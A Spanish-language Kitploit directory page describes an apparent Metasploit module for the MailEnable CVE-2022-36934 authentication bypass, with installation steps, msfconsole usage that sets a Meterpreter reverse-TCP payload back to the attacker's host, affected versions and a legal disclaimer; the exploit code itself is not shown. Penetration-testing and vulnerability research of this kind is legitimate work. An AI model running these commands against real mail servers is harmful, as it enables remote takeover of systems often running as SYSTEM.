Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/tdawg506/mailenable-cve-2022-36934
Frameworks de ExploitsAnálisis de VulnerabilidadesExplotación de Aplicaciones WebPruebas de PenetraciónHerramienta de Acceso RemotoDesarrollo de Payloads
GitHubtdawg506/mailenable-cve-2022-36934

mailenable-cve-2022-36934

Módulo de Metasploit para MailEnable CVE-2022-36934 bypass de autenticación RCE

Ver Repositorio
5hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Módulo de Exploit para MailEnable CVE-2022-36934

Metasploit License

Módulo de Metasploit para la vulnerabilidad de omisión de autenticación de MailEnable (CVE-2022-36934), que conduce a la ejecución remota de código.

📌 Características

  • Explota la inadecuada sanitización de entrada de MailEnable en SMTP/POP3
  • Admite objetivos Windows x86 y x64
  • No requiere interacción del usuario (se activa automáticamente mediante un correo electrónico especialmente diseñado)
  • Funciona contra versiones de MailEnable < 10.40

🚀 Instalación

  1. Copie al directorio de módulos de Metasploit:
    root@kitploit:~
    cp modules/exploits/windows/smtp/mailenable_authbypass_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/smtp/
    
    
  2. Recargue los módulos en msfconsole:

reload_all

  1. Uso:

use exploit/windows/smtp/mailenable_authbypass_rce set RHOSTS <target_ip> set LHOST <your_ip> set PAYLOAD windows/x64/meterpreter/reverse_tcp exploit

🎯 Probado contra:

MailEnable Professional 10.25 Windows Server 2019 MailEnable Enterprise 10.30 Windows Server 2016

📝 Detalles técnicos:

Vulnerabilidad: Omisión de autenticación mediante sintaxis tipo SQLi en SMTP/POP3

Vector de ataque: Red (puertos 25/110)

Privilegios: Se ejecuta como la cuenta de servicio de MailEnable (a menudo SYSTEM)

⚠️ Aviso legal:

Esta herramienta es solo para pruebas autorizadas. No la use contra sistemas que no le pertenezcan o para los que no tenga permiso explícito de prueba.

Descargar herramienta